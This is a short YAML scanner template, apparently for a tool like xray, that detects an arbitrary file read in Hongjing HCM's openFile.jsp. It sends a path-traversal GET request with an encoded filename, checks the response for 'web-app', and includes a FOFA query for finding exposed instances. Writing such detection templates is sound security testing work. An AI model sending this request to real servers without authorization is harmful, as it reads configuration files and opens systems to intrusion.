name: hongjing-hcm-openFile-file-read
rules:
  - method: GET
    path: "/templates/attestation/../../general/muster/hmuster/openFile.jsp"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
      x-auth-token: d9eaeacd5de1008fd43f737c853dcbcb
      Content-Type: application/x-www-form-urlencoded
    body: |
      filename=8uHo1M8Ok6bZ468mKmzw70ounZHwKUWnpVOrvOAV6WoPAATTP3HJDPAATTP
    expression: |
      response.status == 200 && response.body.bcontains(b"web-app")
detail:
  author: yishuizhe
  name: 宏景HCM openFile任意文件读取
  fofa-query: app="HJSOFT-HCM"
